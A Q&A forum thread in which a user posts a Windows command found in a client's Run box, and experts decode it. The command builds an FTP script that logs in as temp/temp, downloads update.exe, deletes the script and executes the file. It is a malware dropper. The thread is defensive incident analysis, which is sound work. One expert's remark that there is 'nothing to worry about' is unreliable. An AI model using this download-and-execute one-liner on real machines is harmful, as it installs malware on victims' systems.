Decoding hackers code

Posted on 2010-01-06
Last Modified: 2012-05-08

I loged onto a clients workstation today to find this in the run box

cmd /c echo open 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

Please could sombody decode this so i am able to understand this
Question by:apcsolutionsuk
    LVL 17

    Expert Comment

    It's simple.

    It connects to in FTP port using windows FTP command
    Then it enters username and password which is temp:temp
    I mean username: temp
    password: temp

    then it downloads update.exe (malware/trojan)

    Then it executes the update.exe (the malware) and exits.

    That's all
    LVL 22

    Expert Comment

    It's downloading an update from a ftp site  to your C:\User\temp directory - running it and then deleting it - and then closing.
    LVL 22

    Accepted Solution

    -n - Suppresses auto-login upon initial connection
    -v - Suppresses verbose display of remote server responses
    -s:filename - Specifies a text file containing ftp commands; the commands will automatically run after ftp starts.
    LVL 22

    Expert Comment

    ik - That's the name of the file containing FTP commands
    LVL 17

    Expert Comment

    I should mention that there is no

    That's a prototype sample script for hackers. There is nothing to worry about this script

    Expert Comment

    Hi apcsolutionsuk,

    CSecurity has asked (at for an explanation of why you selected the answer(s) you selected for this question. It would appear the method you chose to close the question was not in keeping with EE policies, and you may like to consider selecting a more suitable answer as the solution or choosing a different disposition for the question altogether.


    I would appreciate your help in recommending a more suitable form of closure for this question.

    Please make your recommendations as to how this request should be closed. Your recommendations may include:

    1) Delete / No Refund
    2) Delete / Points Refunded
    3) Accept one or more comments as the solution.
    4) PAQ the question and store it in the knowledgebase, refunding the points

    In the case of #3, please be specific and include the specific comment ID(s) which answer this question. To make it easier for us to process this request, when posting the comment ID(s) to use, please post them in the format http:#aCommentID. For example, http:#a12345678.

    When making your recommendation, or if you are unsure what you should recommend, please keep the following in mind:

    * Was a solution to the original problem found? If so, points should be awarded to the comment(s) which solved the problem.
    * Did the Author solve the problem themselves, with Expert input? If so, you should recommend the Author's comment become the 'Accepted' solution, but recommend other Expert comments which should receive a 'split' of their points for contributing to the final solution.
    * Did the Author solve the problem without using any of the Expert advice? If so, the question should be PAQ'ed with points refunded.
    * If no solution was found, the question should be deleted. Points will not be refunded if the Author has not followed-up on one or more of the Expert suggestions or requests in the thread.

    A Moderator will check back on this in about 4 days, at which point we will expect to see an explanation from the Author and a number of recommendations from the participating Experts. If either is not forthcoming, we will assume the unresponsive party is no longer interested in the final disposition of this question, and may close the question in a way which disadvantages you. If neither party responds, it will be at our discretion that the question may be deleted.

    If you have any questions, please also post them below and a Moderator will be more than willing to address your concerns.

    Community Support Moderator
    LVL 17

    Expert Comment

    1st comment of mine was explaining details in easy to understand details.

    Write Comment

    Please enter a first name

    Please enter a last name

    We will never share this with anyone.

    Featured Post

    Highfive + Dolby Voice = No More Audio Complaints!

    Poor audio quality is one of the top reasons people don’t use video conferencing. Get the crispest, clearest audio powered by Dolby Voice in every meeting. Highfive and Dolby Voice deliver the best video conferencing and audio experience for every meeting and every room.

    Whether you've completed a degree in computer sciences or you're a self-taught programmer, writing your first lines of code in the real world is always a challenge. Here are some of the most common pitfalls for new programmers.
    Technology opened people to different means of presenting information, but PowerPoint remains to be above competition. Know why PPT still works today.
    This video Micro Tutorial explains how to clone a hard drive using a commercial software product for Windows systems called Casper from Future Systems Solutions (FSS). Cloning makes an exact, complete copy of one hard disk drive (HDD) onto another d…
    Viewers will learn the different options available in the Backstage view in Excel 2013.

    760 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    11 Experts available now in Live!

    Get 1:1 Help Now